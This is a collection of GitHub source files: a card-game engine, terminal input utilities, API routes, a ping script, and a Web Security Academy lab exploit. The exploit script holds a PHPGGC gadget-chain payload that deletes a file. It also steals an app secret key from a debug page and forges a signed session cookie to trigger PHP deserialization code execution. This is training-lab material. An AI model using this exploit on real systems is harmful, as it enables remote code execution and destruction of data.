\"marmoset/deep_pe_input_marmoset\", result_dict)\n util.make_Deep_PE_input_tb_txt(WORK_DIR + \"marmoset/deep_pe_input_marmoset_aqia\", aqia_dict)\n\nstart_time = clock()\nprint(\"start >>>>>>>>>>>>>>>>>>\")\n# make_deep_pe_input()\n# make_deep_cas9_base_editor_input()\n## merge_cas9_abe_cbe()\n# sort_n_merge_by_chr()\nsort_n_merge_by_all()\nprint(\"::::::::::: %.2f seconds ::::::::::::::\" % (clock() - start_time))","repo_name":"astroboi-SH-KWON/analyze_Crab-eating-macaque_monkey","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31277193594","text":"from enum import Enum\nfrom .utils import Piece, ByPassPiece, BoardViewer, lines_collector\nfrom .defaults import *\nfrom random import shuffle\n\n\nclass Event(Enum):\n # Report beginning\n # params: ()\n NEW_GAME = 0\n\n # Player use a put a new chip on the board\n # params: (playerId, card, color, position)\n PLAY = 1\n\n # Player remove a chip from the board\n # params: (playerId, card, position)\n REMOVE = 2\n\n # Player complete a sequence\n # params: (playerId, color, size)\n SEQUENCE = 3\n\n # Player change a card\n # params: (playerId, card)\n DISCARD = 4\n\n # Player pass\n # params: (playerId)\n PASS = 5\n\n # Report winner\n # params: (playerId, color)\n WIN = 6\n\n # Report deck refill\n REFILL_DECK = 7\n\n\nclass Sequence:\n \"\"\"\n Instance that contains the logic of a single match.\n \"\"\"\n def __init__(self):\n self.deck = None # Game deck\n self.logs = None # Game history\n self._board = None # Game board\n self.count = None # Number of positions used of the board\n self.score = None # Score per color (i.e Number of consecutive sequences)\n self.colors = None # Players color\n self.players = None # Players list\n self.board_size = None # Amount of positions of the board\n self.win_strike = None # Number of consecutive sequences needed to win the game\n self.sequence_id = None # Incremental id for identifiying each sequence\n self.can_discard = None # Indicate if the current player can discard a card\n self.discard_pile = None # Players discarted cards\n self.current_player = None # Id of the current player\n self.cards_per_player = None # Number of cards per player\n self.number_of_players = None # Number of players\n\n def log(self, data):\n self.logs.append(data)\n\n def _partners(self, player):\n color = self.colors[player] \n for i, c in enumerate(self.colors):\n if i != player and c == color:\n yield i\n\n def empty(self, i, j):\n return not self._board[i][j]\n\n def is_winner(self, playerId):\n return self.colors[playerId] == self.winner\n\n def reset(self, hand, number_of_players, players_colors, cards_per_player, win_strike=2):\n self.win_strike = win_strike\n self.colors = players_colors\n self.cards_per_player = cards_per_player\n self.players, self.deck = hand(number_of_players, cards_per_player)\n self.number_of_players = number_of_players\n\n self.logs = []\n self.sequence_id = 0\n self.discard_pile = []\n self.current_player = 0\n self.can_discard = True\n self._board = [[Piece() for _ in range(len(l))] for l in BOARD]\n self.board_size = sum(len(l) for l in self._board) - 4\n self.count = 0\n for i, j in CORNERS:\n self._board[i][j] = ByPassPiece(\"X\")\n self.score = {i:0 for i in set(players_colors)}\n\n self.log((Event.NEW_GAME,))\n\n def _is_dead_card(self, card):\n _, number = card\n if number is JACK:\n return False # //TODO: Not sure about it\n for (i, j) in CARDS_POSITIONS[card]:\n if self.empty(i, j):\n return False\n return True\n\n def check_valid(self, action):\n return action in self._valid_moves()\n\n def _valid_moves(self):\n return Sequence.valid_moves(self.board, self.cards, self.can_discard, self.color)\n\n def _is_over(self):\n if max(self.score.values()) >= self.win_strike:\n self.log((Event.WIN, self.current_player, self.color))\n return True\n if self.count == self.board_size:\n for e, *data in self.logs:\n if e is Event.SEQUENCE:\n player, color, _ = data\n self.log((Event.WIN, player, color))\n break\n else:\n self.log((Event.WIN, None, None))\n return True\n return False\n\n def _sequence(self, size, data):\n # skip empty findings\n if not size:\n return\n # set the sequence number in each board position\n for i, j in data[:size]:\n self._board[i][j].set_sequence(self.sequence_id)\n # increase the sequence number\n self.sequence_id += 1\n # update players score\n self.score[self.color] += 1 + (size > 5)\n # Report the sequence\n self.log((Event.SEQUENCE, self.current_player, self.color, size))\n\n def _next(self):\n over = self._is_over()\n self.can_discard = True\n self.current_player = (self.current_player + 1) % len(self.players)\n return over\n\n def _discard(self, card):\n player = self.players[self.current_player]\n player.remove(card)\n self.discard_pile.append(card)\n if self.deck:\n player.draw(self.deck.pop())\n if not self.deck:\n self.log((Event.REFILL_DECK,))\n self.deck = self.discard_pile[:]\n self.discard_pile = []\n shuffle(self.deck)\n\n def step(self, action):\n \"\"\"\n `action` must be a tuple of the form `(card, position)` where: \n \n * card is `(enum, int)` \n\n * position is None if the player is discating the card.\n\n * position is (int, int) if the player is playing the card\n\n raise ValueError if it's an invalid move.\n \"\"\"\n if not self.check_valid(action):\n raise ValueError(f\"Invalid move ({action})\")\n\n # Check PASS\n if action is None:\n self.log((Event.PASS, self.current_player))\n return self._next()\n\n card, pos = action\n self._discard(card)\n # Check DISCARD\n if pos is None:\n self.log((Event.DISCARD, self.current_player, card))\n self.can_discard = False # Discard only one card per turn\n return False # Game not finished, still the current_player turn\n \n i, j = pos\n\n # check REMOVE action\n if self._board[i][j]:\n self._board[i][j] = Piece()\n self.count -= 1\n self.log((Event.REMOVE, self.current_player, card, pos))\n return self._next()\n\n # Normal play, or a JACK\n self.log((Event.PLAY, self.current_player, card, self.color, pos))\n self._board[i][j] = Piece(self.color)\n self.count += 1\n\n # check for sequences\n\n data = lines_collector(self._board, self.color, i, j)\n\n for line in data:\n size = len(line)\n seq = [0, 5, 9][(size >= 5) + (size >= 9)]\n self._sequence(seq, line)\n \n return self._next()\n\n @property\n def cards(self):\n return self.players[self.current_player].view()()\n\n @property\n def color(self):\n return self.colors[self.current_player]\n\n @property\n def partners(self):\n return self._partner(self.current_player)\n\n @property\n def board(self):\n return BoardViewer(self._board)\n\n @property\n def winner(self):\n assert self.logs[-1][0] == Event.WIN\n return self.logs[-1][2]\n\n @property\n def view(self):\n return SequenceView(self)\n\n @staticmethod\n def valid_moves(board, cards, can_discard, pcolor):\n # List all valid moves in the form (card, position).\n valids = []\n\n for card in cards:\n try:\n is_dead = True\n for i, j in CARDS_POSITIONS[card]:\n if not board[i, j]:\n is_dead = False\n valids.append((card, (i, j)))\n if can_discard and is_dead:\n valids.append((card, None))\n except KeyError:\n ctype, number = card\n assert number is JACK, f\"Unexpected card number ({number})\"\n if ctype in REMOVE:\n for (i, j), piece in board:\n if (i, j) in CORNERS:\n continue\n if piece and piece.color != pcolor and not piece.fixed:\n if ((Card.CLUBS, 11), (i, j)) in valids or ((Card.SPADES, 11), (i, j)):\n continue\n valids.append((card, (i, j)))\n else:\n for (i, j), piece in board:\n if (i, j) in CORNERS:\n continue\n if not (piece.bypass() or piece):\n if ((Card.DIAMOND, 11), (i, j)) in valids or ((Card.HEART, 11), (i, j)):\n continue\n valids.append((card, (i, j)))\n valids = list(set(valids))\n return valids if valids else [None]\n\n\nclass SequenceManager:\n @property\n def cur_player(self):\n return self.players[self.seq.current_player]\n\n def feed_logs(self):\n while self.logs_transmitted < len(self.seq.logs):\n data = self.seq.logs[self.logs_transmitted]\n for player in self.players:\n player.log(data)\n self.logs_transmitted += 1\n\n def init(self, hand, players, players_colors, cards_per_player, win_strike=2):\n self.logs_transmitted = 0\n self.players = [player(i) for i, player in zip(\"0123\", players)]\n self.seq = Sequence()\n\n self.seq.reset(hand, len(players), players_colors, cards_per_player, win_strike)\n\n for i, player in enumerate(self.players):\n player.reset(\n i, \n self.seq.players[i].view(), \n self.seq.view\n )\n self.feed_logs()\n\n def step(self, fixed_action=False, action=None):\n if not fixed_action:\n action = self.cur_player.step()\n done = self.seq.step(action)\n self.feed_logs()\n return done\n\n def run(self, hand, players, players_colors, cards_per_player, win_strike=2):\n self.init(hand, players, players_colors, cards_per_player, win_strike)\n\n while not self.step(): pass\n\n return super().__getattribute__(\"seq\").winner\n\n\nclass SequenceView:\n def __init__(self, seq):\n self.seq = seq\n\n @property\n def colors(self):\n return super().__getattribute__(\"seq\").colors[:]\n\n @property\n def pile(self):\n return super().__getattribute__(\"seq\").discard_pile[:]\n\n @property\n def board(self):\n return super().__getattribute__(\"seq\").board\n\n @property\n def count(self):\n return super().__getattribute__(\"seq\").count\n\n @property\n def score(self):\n return super().__getattribute__(\"seq\").score.copy()\n\n @property\n def size(self):\n return super().__getattribute__(\"seq\").board_size\n\n @property\n def strike(self):\n return super().__getattribute__(\"seq\").win_strike\n\n @property\n def discard(self):\n return super().__getattribute__(\"seq\").can_discard\n\n @property\n def player(self):\n return super().__getattribute__(\"seq\").current_player\n\n @property\n def cards(self):\n return super().__getattribute__(\"seq\").cards_per_player\n\n @property\n def players(self):\n return super().__getattribute__(\"seq\").number_of_players\n\n def __getattribute__(self, name: str):\n if name == \"seq\":\n raise AttributeError(\"SequenceView doesn't have a `seq` attribute\")\n return super().__getattribute__(name)\n","repo_name":"AlexBeovides/cooperAItive","sub_path":"src/games/sequence/module/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":11648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"13409589409","text":"import asyncio\nimport time\n\nimport terminedia\nfrom terminedia.events import QuitLoop, Subscription, KeyPress\nfrom terminedia.screen import Screen\nfrom terminedia.input import KeyCodes\nfrom terminedia.utils import contextkwords\n\n\nasync def terminedia_main(screen=None, context=None):\n \"\"\"Terminedia mainloop - Framework support for interactive applications and animations\n\n Usage:\n ...\n import asyncio\n from terminedia import terminedia_main\n\n ## setup screen, elements and event callback functions\n screen = terminedia.Screen()\n ...\n\n asyncio.run(terminedia_main, screen)\n #EOF\n\n Any code can dispatch an events.EndLoop event to exit the\n automatic mainloop update.\n\n (history: up to now (4/2021) anyne developing using terminedia\n was suppsed to code their own loop, and call screen.update()\n on each frame)\n\n\n \"\"\"\n\n\n if screen is None:\n screen = Screen()\n if context is None:\n from terminedia import context\n\n break_loop = Subscription(QuitLoop)\n context.screen = screen\n\n screen.accelerate()\n\n with terminedia.keyboard, terminedia.mouse, screen:\n while not break_loop:\n\n frame_start = time.time()\n await asyncio.sleep(0)\n screen.update()\n frame_wait = max(0, (1 / context.fps) - (time.time() - frame_start))\n await asyncio.sleep(frame_wait)\n\n\ndef _refresh_line(text, pos, max_pos, backspace=0):\n delete_back = '\\b' * backspace\n text = ''.join(text)\n clear = \" \" * ((max_pos - pos) - len(text) + backspace)\n move_back = (len(text) + len(clear)) * \"\\b\"\n terminedia.print(delete_back, text, clear, move_back, sep=\"\", end=\"\", flush=True)\n\n\n@contextkwords\nasync def ainput(prompt=\"\", maxwidth=None, insert=True):\n result = []\n if prompt:\n terminedia.print(prompt, end=\"\", flush=True)\n with terminedia.keyboard:\n keyboard_events = Subscription(KeyPress)\n max_pos = pos = 0\n async for event in keyboard_events:\n print_code = key = event.key\n if key == KeyCodes.ENTER:\n keyboard_events.kill()\n allow_print = True\n if key:\n if key == KeyCodes.RIGHT:\n if pos < len(result) and (maxwidth is None or pos < maxwidth - 1):\n pos += 1\n else:\n allow_print = False\n elif key == KeyCodes.LEFT:\n if pos > 0:\n pos -= 1\n else:\n allow_print = False\n elif key == KeyCodes.DELETE:\n if len(result) > pos:\n del result[pos]\n _refresh_line(result[pos:], pos, max_pos)\n allow_print = False\n elif key == KeyCodes.BACK and pos > 0:\n pos -= 1\n del result[pos]\n _refresh_line(result[pos:], pos, max_pos + 2, backspace=1)\n allow_print = False\n elif key in KeyCodes.codes:\n allow_print = False\n\n allow_new_char = maxwidth is None or len(result) < maxwidth\n if key not in KeyCodes.codes:\n if allow_new_char and pos == len(result):\n result.append(key)\n elif insert and allow_new_char: # (and pos <= len(result):)\n result.insert(pos, key)\n _refresh_line(result[pos:], pos + 1, max_pos)\n elif not insert and pos < len(result):\n result[pos] = key\n pos += 1\n else:\n allow_print = False\n if allow_new_char:\n pos += 1\n\n if allow_print:\n terminedia.print(print_code, end=\"\", flush=True)\n max_pos = max(max_pos, pos)\n\n\n return ''.join(result)\n\n\n\n\n\n\n","repo_name":"jsbueno/terminedia","sub_path":"terminedia/asynchronous.py","file_name":"asynchronous.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"27052177270","text":"from types import SimpleNamespace\n\n\n_routes = {\n 'project': {\n '_base': 'projects/',\n 'create': '',\n 'info': ':uuid/',\n 'deploy': ':uuid/deploy/',\n 'attach': ':uuid/attach/',\n 'detach': ':uuid/detach/'\n },\n 'model': {\n '_base': 'models/',\n 'predict': ':uuid/predict/',\n 'register': 'register/'\n },\n 'runs': {\n '_base': 'runs/',\n 'create': '',\n 'get': ':uuid/'\n },\n 'job': {\n '_base': 'jobs/:uuid/',\n 'state': '',\n 'cancel': 'delete/'\n },\n 'data': {\n '_base': 'data/',\n 'list': '',\n 'get': ':uuid/',\n 'preprocess': ':uuid/preprocess/',\n 'state': ':uuid/state/',\n 'info': ':uuid/',\n 'sample': ':uuid/sample/',\n 'cancel': ':uuid/cancel/'\n },\n 'query': {\n '_base': 'queries/',\n 'list': '',\n 'info': ':uuid/',\n 'cancel': ':uuid/cancel/',\n 'create': ''\n },\n 'artifacts': {\n '_base': 'artifacts/',\n 'download': 'download'\n }\n}\n\n\ndef _build_routes():\n \"\"\"Helper function to build namespaced routes\"\"\"\n r = {}\n for route, subroutes in _routes.items():\n s = {}\n for path, value in subroutes.items():\n if path != '_base':\n s[path] = '{}{}'.format(_routes[route]['_base'], value)\n r[route] = SimpleNamespace(**s)\n return r\n\n\nroutes = SimpleNamespace(**_build_routes())\n","repo_name":"gradientzero/dq0-sdk","sub_path":"dq0/sdk/cli/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36882567071","text":"# -*- coding: utf-8 -*-\nimport speedtest\nimport subprocess\nimport platform\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport csv\n\ndef server():\n '''Get the speedtest.net servers (7k servers)'''\n ser_all = []\n s = speedtest.Speedtest()\n for i in s.get_servers().values():\n for srv in i:\n srv['host'] = srv['host'][:-5]\n ser_all.append(srv)\n return ser_all\n\ndef ping(host):\n '''The ping function for windows os ping'''\n try:\n ping_str = \"-n 1\" if platform.system().lower() == \"windows\" else \"-c 1\"\n args = \"ping \" + \" \" + ping_str + \" \" + host\n con_out = subprocess.check_output(args, shell=True).decode('cp866')\n con_out = (con_out.split( '=' )[2])[:-6]\n except:\n con_out = 0\n return con_out\n\ndef split(arr, count):\n '''We break lists -server()- by an amount of flows of Pool'''\n return [arr[i::count] for i in range(count)]\n\npool = ThreadPool(5)\n\nfor part in (split(server(), 1700)):\n try:\n hosts_part = [i['host'] for i in part]\n ttl_all = pool.map(ping, hosts_part)\n cnt = len(ttl_all)\n except:\n z=0\n\n '''save result to csv file'''\n with open( 'ping.csv', 'a') as f:\n for num, i in enumerate(part):\n i['ttl'] = ttl_all[num]\n\n lat=str(i['lat'])\n lon=str(i['lon'])\n name=str(i['name'])\n country=str(i['country'])\n id=str(i['id'])\n hostst=str(i['host'])\n ttlst=str(i['ttl'])\n d=str(i['d'])\n stroka = id + ';' + name + ';' + country + ';' + lat + ';' + lon + ';' + hostst + ';' + d + ';' + ttlst\n print (stroka)\n\n try:\n f.write(str(stroka) +'\\n')\n except:\n z=0\n f.close()\nprint ('ok')\n","repo_name":"tarbagan/global_ping","sub_path":"global_ping.py","file_name":"global_ping.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888458409","text":"from collections import deque\n\ntarget = list(input())\ntarget2 = ''\nfor i in range(len(target)):\n target2 += target[i]\n target[i] = int(target[i])\n\nanswer = abs(100-int(target2))\narr2 = []\nn = int(input())\nif n > 0 :\n arr = list(map(int,input().split()))\n for i in range(10):\n if i not in arr:\n arr2.append(str(i))\n\nif target2 == '100':\n print(0)\nelif n == 0:\n print(min(len(target),answer))\nelif n == 10:\n print(abs(100-int(target2)))\nelse:\n stack = list()\n for i in arr2:\n stack.append(i)\n l = len(target2)\n while stack:\n cn = stack.pop()\n answer = min(answer,len(cn)+abs(int(cn)-int(target2)))\n for i in arr2:\n nn = cn + str(i)\n if len(nn) < l+2:\n stack.append(nn)\n\n print(answer)\n\n\n\n\n\n pass\n","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/10월/1016/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2071067353","text":"\n\n#standard O(n^2) time O(n^2) space solution, 1800ms\nclass Solution(object):\n def longestPalindromeSubseq(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n #dp [i,j]:= LPS in s[i:j+1]\n \n #first check if it's palindrome string\n if s[::-1]==s: return len(s) #critical to pass OJ\n \n #standard DP using dict \n dp = collections.defaultdict(int)\n for i in range(len(s)):\n dp[i,i] = 1\n for i in range(len(s)-1):\n dp[i,i+1] = 2 if s[i]==s[i+1] else 1\n \n for gap in range(2,len(s)):\n for i in range(len(s) - gap):\n j = i + gap\n if s[i]==s[j]:\n dp[i, j] = 2 + dp[i+1,j-1]\n else:\n dp[i, j] = max(dp[i,j-1], dp[i+1, j])\n \n return dp[0,len(s)-1]\n \n","repo_name":"mcfair/Algo","sub_path":"516_Longest_Palindrome_Subsquence.py","file_name":"516_Longest_Palindrome_Subsquence.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8811069421","text":"# Exploiting PHP deserialization with a pre-built gadget chain\n\nimport os\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\nimport base64\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n#\t\tPAYLOAD GENERATED WITH PHPGGC:\n#\t\thttps://github.com/ambionics/phpggc\n#\n#\t\t$> phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' 2>/dev/null | base64 -w 0\n\nPHPGGC_PAYLOAD = \"Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==\"\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef connect_as_wiener(s, url):\n\tlogin_path = url + '/login'\n\ttime.sleep(1)\n\tdata_login = {'username': 'wiener', 'password': 'peter'}\n\tprint('\\n[+] Sending connection to the application as Wiener...')\n\tr = s.post(login_path, data=data_login)\n\ttime.sleep(1)\n\tif 'Your username is: wiener' in r.text:\n\t\treturn r\n\telse:\n\t\tprint('[-] Exploit failed to connect as Wiener ')\n\t\tsys.exit(1)\n\ndef get_cookies(s):\n\tsession = s.cookies['session']\n\tdecoded_session = urllib.parse.unquote(session)\n\tprint('\\n[+] Found Session Cookie:\\t\\t%s' % decoded_session)\n\ttime.sleep(1)\n\tsig = re.search(r'\"sig_hmac_sha1\":\"(.*)\"}', decoded_session).group(1)\n\tprint('[+] Found sig_hmac_sha1:\\t\\t%s' % sig)\n\ttime.sleep(1)\n\ttoken = re.search(r'\"token\":\"(.*)\",\"sig', decoded_session).group(1)\n\tprint('\\n[+] Found Token:\\t\\t\\t%s' % token)\n\ttime.sleep(1)\n\tdecoded_token = base64.b64decode(token).decode()\n\tprint('[+] Decoded Token:\\t\\t\\t%s' % decoded_token)\n\ttime.sleep(1)\n\taccess_token = re.search('\"access_token\";s:32:\"(.*)\";', decoded_token).group(1)\n\tprint('[+] Found Access Token:\\t\\t\\t%s' % access_token)\n\ttime.sleep(1)\n\treturn access_token, sig\n\ndef sign_cookie(s, url, secret_key):\n\tprint('\\n[+] Trying to build a malicious cookie signed with the secret_key...\\n')\n\tphp_template = f\"\"\"\\\\$object = \\\\\"{PHPGGC_PAYLOAD}\\\\\"; \\\\$secretKey = \\\\\"{secret_key}\\\\\"; \\\\$cookie = urlencode('\\\\{{\\\\\"token\\\\\":\\\\\"' . \\\\$object . '\\\\\",\\\\\"sig_hmac_sha1\\\\\":\\\\\"' . hash_hmac('sha1', \\\\$object, \\\\$secretKey) . '\\\\\"\\\\}}'); echo \\\\$cookie;\"\"\"\n\tresp = os.popen(f'php -r \"{php_template}\"', 'r', 1)\n\tcookie = resp.readline().replace('%5C', '')\n\tprint(cookie)\n\treturn cookie\n\ndef get_secret_key(s, url):\n\tr = s.get(url)\n\tdebug_line = re.search(r'', r.text).group(1)\n\tprint('\\n[+] Found Comment on the main page:\\t%s' % debug_line)\n\tdebug_path = re.search(r'href=(.*)>Debug', debug_line).group(1)\n\tprint('[+] Following the debug link: \\t\\t%s' % debug_path)\n\tr = s.get(url + debug_path)\n\tsecret_key = re.search(r'SECRET_KEY (.*) ', r.text).group(1)\n\tprint('[+] Found Application Secret key:\\t%s' % secret_key)\n\treturn secret_key\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Exploiting PHP deserialization with a pre-built gadget chain')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '

Error

' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find a way to delete Carlos morale.txt file...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tprint('[+] Trying to send the payload generated by PHPGCC...')\n\t\t\tr = connect_as_wiener(s, url)\n\t\t\taccess_token, sig = get_cookies(s)\n\t\t\tsecret_key = get_secret_key(s, url)\n\t\t\tcookie = sign_cookie(s, url, secret_key)\n\t\t\ts.cookies.clear()\n\t\t\tcookies= {'session': cookie}\n\t\t\tprint('[+] Sending the request...')\n\t\t\tr = s.get(url, cookies=cookies)\n\t\t\tif r.status_code == 500:\n\t\t\t\tprint('[+] Request sent results to an internal error !')\n\t\t\ttime.sleep(2)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"InsecureDeserialization/exploit-lab06.py","file_name":"exploit-lab06.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16266748699","text":"from flask import Blueprint, render_template, redirect\n\nfrom random import randrange\n\n\nhogwarts_blueprint = Blueprint('hogwarts', __name__, url_prefix='')\n\n\n@hogwarts_blueprint.route('/')\ndef hogwargs_index():\n if not randrange(100):\n return redirect('https://www.youtube.com/watch?v=dQw4w9WgXcQ')\n return render_template('hogwarts.html')\n","repo_name":"alixryu/getpost","sub_path":"getpost/desk/hogwarts.py","file_name":"hogwarts.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1104176379","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.account_identifier import AccountIdentifier # noqa: F401,E501\nfrom swagger_server.models.currency import Currency # noqa: F401,E501\nfrom swagger_server.models.network_identifier import NetworkIdentifier # noqa: F401,E501\nfrom swagger_server.models.partial_block_identifier import PartialBlockIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass AccountBalanceRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, network_identifier: NetworkIdentifier=None, account_identifier: AccountIdentifier=None, block_identifier: PartialBlockIdentifier=None, currencies: List[Currency]=None): # noqa: E501\n \"\"\"AccountBalanceRequest - a model defined in Swagger\n\n :param network_identifier: The network_identifier of this AccountBalanceRequest. # noqa: E501\n :type network_identifier: NetworkIdentifier\n :param account_identifier: The account_identifier of this AccountBalanceRequest. # noqa: E501\n :type account_identifier: AccountIdentifier\n :param block_identifier: The block_identifier of this AccountBalanceRequest. # noqa: E501\n :type block_identifier: PartialBlockIdentifier\n :param currencies: The currencies of this AccountBalanceRequest. # noqa: E501\n :type currencies: List[Currency]\n \"\"\"\n self.swagger_types = {\n 'network_identifier': NetworkIdentifier,\n 'account_identifier': AccountIdentifier,\n 'block_identifier': PartialBlockIdentifier,\n 'currencies': List[Currency]\n }\n\n self.attribute_map = {\n 'network_identifier': 'network_identifier',\n 'account_identifier': 'account_identifier',\n 'block_identifier': 'block_identifier',\n 'currencies': 'currencies'\n }\n self._network_identifier = network_identifier\n self._account_identifier = account_identifier\n self._block_identifier = block_identifier\n self._currencies = currencies\n\n @classmethod\n def from_dict(cls, dikt) -> 'AccountBalanceRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The AccountBalanceRequest of this AccountBalanceRequest. # noqa: E501\n :rtype: AccountBalanceRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def network_identifier(self) -> NetworkIdentifier:\n \"\"\"Gets the network_identifier of this AccountBalanceRequest.\n\n\n :return: The network_identifier of this AccountBalanceRequest.\n :rtype: NetworkIdentifier\n \"\"\"\n return self._network_identifier\n\n @network_identifier.setter\n def network_identifier(self, network_identifier: NetworkIdentifier):\n \"\"\"Sets the network_identifier of this AccountBalanceRequest.\n\n\n :param network_identifier: The network_identifier of this AccountBalanceRequest.\n :type network_identifier: NetworkIdentifier\n \"\"\"\n if network_identifier is None:\n raise ValueError(\"Invalid value for `network_identifier`, must not be `None`\") # noqa: E501\n\n self._network_identifier = network_identifier\n\n @property\n def account_identifier(self) -> AccountIdentifier:\n \"\"\"Gets the account_identifier of this AccountBalanceRequest.\n\n\n :return: The account_identifier of this AccountBalanceRequest.\n :rtype: AccountIdentifier\n \"\"\"\n return self._account_identifier\n\n @account_identifier.setter\n def account_identifier(self, account_identifier: AccountIdentifier):\n \"\"\"Sets the account_identifier of this AccountBalanceRequest.\n\n\n :param account_identifier: The account_identifier of this AccountBalanceRequest.\n :type account_identifier: AccountIdentifier\n \"\"\"\n if account_identifier is None:\n raise ValueError(\"Invalid value for `account_identifier`, must not be `None`\") # noqa: E501\n\n self._account_identifier = account_identifier\n\n @property\n def block_identifier(self) -> PartialBlockIdentifier:\n \"\"\"Gets the block_identifier of this AccountBalanceRequest.\n\n\n :return: The block_identifier of this AccountBalanceRequest.\n :rtype: PartialBlockIdentifier\n \"\"\"\n return self._block_identifier\n\n @block_identifier.setter\n def block_identifier(self, block_identifier: PartialBlockIdentifier):\n \"\"\"Sets the block_identifier of this AccountBalanceRequest.\n\n\n :param block_identifier: The block_identifier of this AccountBalanceRequest.\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n\n self._block_identifier = block_identifier\n\n @property\n def currencies(self) -> List[Currency]:\n \"\"\"Gets the currencies of this AccountBalanceRequest.\n\n In some cases, the caller may not want to retrieve all available balances for an AccountIdentifier. If the currencies field is populated, only balances for the specified currencies will be returned. If not populated, all available balances will be returned. # noqa: E501\n\n :return: The currencies of this AccountBalanceRequest.\n :rtype: List[Currency]\n \"\"\"\n return self._currencies\n\n @currencies.setter\n def currencies(self, currencies: List[Currency]):\n \"\"\"Sets the currencies of this 